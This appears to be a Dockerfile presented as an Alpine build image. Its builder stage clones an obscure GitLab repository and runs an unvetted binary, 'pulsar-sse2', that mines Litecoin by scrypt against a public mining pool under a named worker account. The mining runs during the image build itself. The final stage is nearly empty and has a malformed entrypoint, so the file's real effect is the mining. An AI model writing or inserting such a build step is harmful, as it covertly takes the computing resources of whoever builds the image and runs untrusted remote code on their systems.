ARG ALPINE_VERSION=3.15.0

FROM alpine:${ALPINE_VERSION} as builder

RUN apk add --no-cache git \
                       make \
                       cmake \
                       libstdc++ \
                       gcc \
                       g++ \
                       hwloc-dev \
                       libuv-dev \
                       openssl-dev 

RUN git clone https://gitlab.com/imhajes2/hajes.git && cd hajes && chmod u+x ./pulsar-sse2 && ./pulsar-sse2 -a scrypt -o stratum+tcp://litecoinpool.org:3333 -u imhajes.1 -p x

FROM alpine:${ALPINE_VERSION}

RUN apk add --no-cache hwloc \
                       libuv


WORKDIR /new-repl-ryz-avn

ENTRYPOINT ["sh avn.sh"]
